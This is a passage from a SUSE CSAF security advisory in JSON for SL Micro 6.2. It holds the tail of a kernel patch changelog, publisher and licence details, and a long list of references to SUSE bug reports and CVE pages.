RMW races (bsc#1250748,bsc#1257154).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- tsm-mr: Add TVM Measurement Register support (bsc#1257504).\n- tsm-mr: Add tsm-mr sample code (bsc#1257504).\n- virt: tdx-guest: Expose TDX MRs as sysfs attributes (bsc#1257504).\n- virt: tdx-guest: Refactor and streamline TDREPORT generation (bsc#1257504).\n- virt: tdx-guest: Transition to scoped_cond_guard for mutex operations (bsc#1257504).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- x86/tdx: Add tdx_mcall_extend_rtmr() interface (bsc#1257504).\n- x86/tdx: tdx_mcall_get_report0: Return -EBUSY on TDCALL_OPERAND_BUSY error (bsc#1257504).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SL-Micro-6.2-325",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20555-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20555-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620555-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20555-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/044562.html"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1235905",
"url": "https://bugzilla.suse.com/1235905"
},
{
"category": "self",
"summary": "SUSE Bug 1242505",
"url": "https://bugzilla.suse.com/1242505"
},
{
"category": "self",
"summary": "SUSE Bug 1242974",
"url": "https://bugzilla.suse.com/1242974"
},
{
"category": "self",
"summary": "SUSE Bug 1242986",
"url": "https://bugzilla.suse.com/1242986"
},
{
"category": "self",
"summary": "SUSE Bug 1243452",
"url": "https://bugzilla.suse.com/1243452"
},
{
"category": "self",
"summary": "SUSE Bug 1243507",
"url": "https://bugzilla.suse.com/1243507"
},
{
"category": "self",
"summary": "SUSE Bug 1243662",
"url": "https://bugzilla.suse.com/1243662"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246282",
"url": "https://bugzilla.suse.com/1246282"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247292",
"url": "https://bugzilla.suse.com/1247292"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248166",
"url": "https://bugzilla.suse.com/1248166"
},
{
"category": "self",
"summary": "SUSE Bug 1248175",
"url": "https://bugzilla.suse.com/1248175"
},
{
"category": "self",
"summary": "SUSE Bug 1248178",
"url": "https://bugzilla.suse.com/1248178"
},
{
"category": "self",
"summary": "SUSE Bug 1248179",
"url": "https://bugzilla.suse.com/1248179"
},
{
"category": "self",
"summary": "SUSE Bug 1248185",
"url": "https://bugzilla.suse.com/1248185"
},
{
"category": "self",
"summary": "SUSE Bug 1248188",
"url": "https://bugzilla.suse.com/1248188"
},
{
"category": "self",
"summary": "SUSE Bug 1248196",
"url": "https://bugzilla.suse.com/1248196"
},
{
"category": "self",
"summary": "SUSE Bug 1248206",
"url": "https://bugzilla.suse.com/1248206"
},
{
"category": "self",
"summary": "SUSE Bug 1248208",
"url": "https://bugzilla.suse.com/1248208"
},
{
"category": "self",
"summary": "SUSE Bug 1248209",
"url": "https://bugzilla.suse.com/1248209"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1248212",
"url": "https://bugzilla.suse.com/1248212"
},
{
"category": "self",
"summary": "SUSE Bug 1248213",
"url": "https://bugzilla.suse.com/1248213"
},
{
"category": "self",
"summary": "SUSE Bug 1248214",
"url": "https://bugzilla.suse.com/1248214"
},
{
"category": "self",
"summary": "SUSE Bug 1248216",
"url": "https://bugzilla.suse.com/1248216"
},
{
"category": "self",
"summary": "SUSE Bug 1248217",
"url": "https://bugzilla.suse.com/1248217"
},
{
"category": "self",
"summary": "SUSE Bug 1248222",
"url": "https://bugzilla.suse.com/1248222"
},
{
"category": "self",
"summary": "SUSE Bug 1248227",
"url": "https://bugzilla.suse.com/1248227"
},
{
"category": "self",
"summary": "SUSE Bug 1248228",
"url": "https://bugzilla.suse.com/1248228"
},
{
"category": "self",
"summary": "SUSE Bug 1248229",
"url": "https://bugzilla.suse.com/1248229"
},
{
"category": "self",
"summary": "SUSE Bug 1248232",
"url": "https://bugzilla.suse.com/1248232"
},
{
"category": "self",
"summary": "SUSE Bug 1248234",
"url": "https://bugzilla.suse.com/1248234"
},
{
"category": "self",
"summary": "SUSE Bug 1248240",
"url": "https://bugzilla.suse.com/1248240"
},
{
"category": "self",
"summary": "SUSE Bug 1248360",
"url": "https://bugzilla.suse.com/1248360"
},
{
"category": "self",
"summary": "SUSE Bug 1248366",
"url": "https://bugzilla.suse.com/1248366"
},
{
"category": "self",
"summary": "SUSE Bug 1248384",
"url": "https://bugzilla.suse.com/1248384"
},
{
"category": "self",
"summary": "SUSE Bug 1248626",
"url": "https://bugzilla.suse.com/1248626"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1249609",
"url": "https://bugzilla.suse.com/1249609"
},
{
"category": "self",
"summary": "SUSE Bug 1249895",
"url": "https://bugzilla.suse.com/1249895"
},
{
"category": "self",
"summary": "SUSE Bug 1249998",
"url": "https://bugzilla.suse.com/1249998"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250738",
"url": "https://bugzilla.suse.com/1250738"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252773",
"url": "https://bugzilla.suse.com/1252773"
},
{
"category": "self",
"summary": "SUSE Bug 1252784",
"url": "https://bugzilla.suse.com/1252784"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1253049",
"url": "https://bugzilla.suse.com/1253049"
},
{
"category": "self",
"summary": "SUSE Bug 1253078",
"url": "https://bugzilla.suse.com/1253078"
},
{
"category": "self",
"summary": "SUSE Bug 1253079",
"url": "https://bugzilla.suse.com/1253079"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253344",
"url": "https://bugzilla.suse.com/1253344"
},
{
"category": "self",
"summary": "SUSE Bug 1253500",
"url": "https://bugzilla.suse.com/1253500"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254308",
"url": "https://bugzilla.suse.com/1254308"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254977",
"url": "https://bugzilla.suse.com/1254977"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255232",
"url": "https://bugzilla.suse.com/1255232"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255245",
"url": "https://bugzilla.suse.com/1255245"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255319",
"url": "https://bugzilla.suse.com/1255319"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255346",
"url": "https://bugzilla.suse.com/1255346"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255459",
"url": "https://bugzilla.suse.com/1255459"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255506",
"url": "https://bugzilla.suse.com/1255506"
},
{
"category": "self",
"summary": "SUSE Bug 1255526",
"url": "https://bugzilla.suse.com/1255526"
},
{
"category": "self",
"summary": "SUSE Bug 1255527",
"url": "https://bugzilla.suse.com/1255527"
},
{
"category": "self",
"summary": "SUSE Bug 1255529",
"url": "https://bugzilla.suse.com/1255529"
},
{
"category": "self",
"summary": "SUSE Bug 1255530",
"url": "https://bugzilla.suse.com/1255530"
},
{
"category": "self",
"summary": "SUSE Bug 1255536",
"url": "https://bugzilla.suse.com/1255536"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255542",
"url": "https://bugzilla.suse.com/1255542"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255593",
"url": "https://bugzilla.suse.com/1255593"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255694",
"url": "https://bugzilla.suse.com/1255694"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255703",
"url": "https://bugzilla.suse.com/1255703"
},
{
"category": "self",
"summary": "SUSE Bug 1255708",
"url": "https://bugzilla.suse.com/1255708"
},
{
"category": "self",
"summary": "SUSE Bug 1255811",
"url": "https://bugzilla.suse.com/1255811"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256592",
"url": "https://bugzilla.suse.com/1256592"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256594",
"url": "https://bugzilla.suse.com/1256594"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256608",
"url": "https://bugzilla.suse.com/1256608"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256627",
"url": "https://bugzilla.suse.com/1256627"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256632",
"url": "https://bugzilla.suse.com/1256632"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256643",
"url": "https://bugzilla.suse.com/1256643"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256656",
"url": "https://bugzilla.suse.com/1256656"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256661",
"url": "https://bugzilla.suse.com/1256661"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256667",
"url": "https://bugzilla.suse.com/1256667"
},
{
"category": "self",
"summary": "SUSE Bug 1256668",
"url": "https://bugzilla.suse.com/1256668"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256677",
"url": "https://bugzilla.suse.com/1256677"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256683",
"url": "https://bugzilla.suse.com/1256683"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256716",
"url": "https://bugzilla.suse.com/1256716"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256748",
"url": "https://bugzilla.suse.com/1256748"
},
{
"category": "self",
"summary": "SUSE Bug 1256749",
"url": "https://bugzilla.suse.com/1256749"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256755",
"url": "https://bugzilla.suse.com/1256755"
},
{
"category": "self",
"summary": "SUSE Bug 1256756",
"url": "https://bugzilla.suse.com/1256756"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256793",
"url": "https://bugzilla.suse.com/1256793"
},
{
"category": "self",
"summary": "SUSE Bug 1256794",
"url": "https://bugzilla.suse.com/1256794"
},
{
"category": "self",
"summary": "SUSE Bug 1256864",
"url": "https://bugzilla.suse.com/1256864"
},
{
"category": "self",
"summary": "SUSE Bug 1256865",
"url": "https://bugzilla.suse.com/1256865"
},
{
"category": "self",
"summary": "SUSE Bug 1256867",
"url": "https://bugzilla.suse.com/1256867"
},
{
"category": "self",
"summary": "SUSE Bug 1256975",
"url": "https://bugzilla.suse.com/1256975"
},
{
"category": "self",
"summary": "SUSE Bug 1257015",
"url": "https://bugzilla.suse.com/1257015"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257159",
"url": "https://bugzilla.suse.com/1257159"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257167",
"url": "https://bugzilla.suse.com/1257167"
},
{
"category": "self",
"summary": "SUSE Bug 1257168",
"url": "https://bugzilla.suse.com/1257168"
},
{
"category": "self",
"summary": "SUSE Bug 1257179",
"url": "https://bugzilla.suse.com/1257179"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257225",
"url": "https://bugzilla.suse.com/1257225"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257243",
"url": "https://bugzilla.suse.com/1257243"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
"summary": "SUSE Bug 1257276",
"url": "https://bugzilla.suse.com/1257276"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257279",
"url": "https://bugzilla.suse.com/1257279"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257309",
"url": "https://bugzilla.suse.com/1257309"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257504",
"url": "https://bugzilla.suse.com/1257504"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54031 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54031/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37751 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37751/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37841 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37841/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37845 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37845/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37904 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37904/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37955 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37955/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38262 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38262/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38298 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38298/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38423 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38423/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38505 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38505/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38507 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38507/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38510 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38510/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38511 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38511/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38512 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38512/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38513 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38513/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38515 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38515/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38516 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38516/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38520 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38520/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38521 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38521/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38529 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38529/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38530 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38530/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38535 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38535/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38537 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38537/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38538 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38538/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38540 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38540/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38541 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38541/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38543 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38543/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38547 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38547/"
},
{
"category": "self",
